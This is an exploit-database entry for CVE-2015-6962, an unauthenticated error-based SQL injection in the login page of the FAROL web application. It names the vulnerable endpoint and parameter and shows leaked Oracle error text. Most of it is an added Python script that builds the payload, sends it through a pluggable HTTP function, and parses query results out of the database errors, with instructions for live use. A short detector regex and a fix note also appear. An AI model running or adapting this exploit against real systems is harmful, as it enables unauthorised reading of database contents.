FAROL - SQL Injection Vulnerability

ID 1337DAY-ID-24258
Type zdt
Reporter Thierry Fernandes Faria
Modified 2015-09-16T00:00:00


Exploit for php platform in category web applications

# Exploit Title: Web Application Farol with unauthenticated SQL injection
# Date: 2015-09-16
# Exploit Author: Thierry Fernandes Faria [ a.k.a SoiL ] [ thierryfariaa (at) gmail (dot) com ]
# Vendor Homepage:http://www.teiko.com.br/pt/solucoes/infraestrutura-em-ti/farol
# Version: [All]
# CVE : CVE-2015-6962
# OWASP Top10: A1-Injection
+ Product Description +
FAROL is a web application that monitors databases.
+ Exploitation Details +
An unauthenticated SQL injection vulnerability has been detected in the login page of the FAROL web application.
The e-mail field on the login page (the recuperar action) is vulnerable to error-based SQL injection: the back-end database is Oracle and its error messages are returned in the HTTP response, so query results can be read out of the error text.
Vulnerable Page: http://target/tkmonitor/estrutura/login/Login.actions.php?recuperar
Vulnerable POST Parameter: email
Usage: email'[error-based SQLi payload]--
Example server response to the injected value (Oracle Text error):
ORA-20000: Oracle Text error:
DRG-11701: thesaurus CORE ProductionNLSRTL Version - ProductionOracle Database 11g Enterprise Edition Release - 64bit ProductionPL/SQL Release - ProductionTNS for Linux: Version - Production does not exist
ORA-06512: at "CTXSYS.DRUE", line 160
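A worked probe for the behaviour described above, added here as an example; it is not part of the original advisory or of the FAROL product. It assumes the standard Oracle Text trick behind a DRG-11701 error (a ctxsys.drithsx.sn call whose second argument is a subquery, which the advisory's output is consistent with but does not state), and the sample HTTP response is constructed, not captured. It also includes the cheap detection check a defender would put in front of the same parameter.

```python
import re
from typing import Callable, Optional
from urllib.parse import parse_qs, urlencode

# Endpoint and parameter named in the advisory.
VULN_PATH = "/tkmonitor/estrutura/login/Login.actions.php?recuperar"
VULN_PARAM = "email"

# Oracle Text's thesaurus lookup fails with DRG-11701 naming the thesaurus it
# was asked for. If that name is a subquery's result, the result lands in the
# error text. ASSUMPTION: the advisory shows the DRG-11701 / CTXSYS.DRUE error
# but not the exact payload; ctxsys.drithsx.sn is used here as the standard
# way to trigger it.
LEAK_PATTERN = re.compile(r"DRG-11701: thesaurus (.*?) does not exist", re.S)

# Payload shape from the advisory: close the quote, run SQL, comment out the rest.
INJECTION_MARKERS = re.compile(r"'.*--|ctxsys\.", re.I | re.S)


def build_payload(subquery: str) -> str:
    """Value for the e-mail field that makes Oracle evaluate `subquery` inside
    a thesaurus lookup; the subquery must return exactly one VARCHAR2 value."""
    return f"x'||ctxsys.drithsx.sn(1,({subquery}))--"


def build_post_body(subquery: str) -> str:
    """URL-encoded form body, as the login page's POST would carry it."""
    return urlencode({VULN_PARAM: build_payload(subquery)})


def decode_post_body(body: str) -> str:
    """Recover the raw e-mail value from a form body (what the server sees)."""
    return parse_qs(body)[VULN_PARAM][0]


def extract_from_error(response_body: str) -> Optional[str]:
    """Pull the leaked value out of a DRG-11701 error, or None if absent."""
    match = LEAK_PATTERN.search(response_body)
    return match.group(1).strip() if match else None


def probe(post: Callable[[str, str], str], base_url: str, subquery: str) -> Optional[str]:
    """One error-based extraction round trip.

    `post(url, body)` must return the response body as text; wrap requests or
    urllib for real use, or pass a stub to run offline.
    """
    return extract_from_error(post(base_url + VULN_PATH, build_post_body(subquery)))


def is_injection_attempt(email_value: str) -> bool:
    """Cheap WAF/log check for this payload shape in the e-mail field."""
    return bool(INJECTION_MARKERS.search(email_value))


# Constructed sample response (not captured from a real system), shaped like
# the error text in the advisory; the version numbers are omitted there too.
SAMPLE_RESPONSE = (
    "<html><body>ORA-20000: Oracle Text error:\n"
    "DRG-11701: thesaurus Oracle Database 11g Enterprise Edition Release "
    "- 64bit Production does not exist\n"
    'ORA-06512: at "CTXSYS.DRUE", line 160</body></html>'
)


def offline_demo() -> Optional[str]:
    """Run the probe against the constructed response instead of a live host."""
    def fake_post(url: str, body: str) -> str:
        return SAMPLE_RESPONSE
    return probe(fake_post, "http://target", "select banner from v$version where rownum=1")


if __name__ == "__main__":
    body = build_post_body("select user from dual")
    print("POST body:", body)
    print("Decoded e-mail value:", decode_post_body(body))
    print("Flagged by detector:", is_injection_attempt(decode_post_body(body)))
    print("Leaked value (offline demo):", offline_demo())
```

For real use, pass a `post` function that performs the HTTP POST against a host you are authorised to test; `extract_from_error` only reads the leaked value back, so each call retrieves one row and one column, and a subquery returning more than one row will fail with a different ORA error rather than leak.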
+ Solution +
Upgrade the software to a vendor release that addresses the issue. The underlying fix is to pass the e-mail value to the database as a bind parameter rather than concatenating it into the SQL string, and to stop returning raw database errors to the client.

#  0day.today [2018-02-09]  #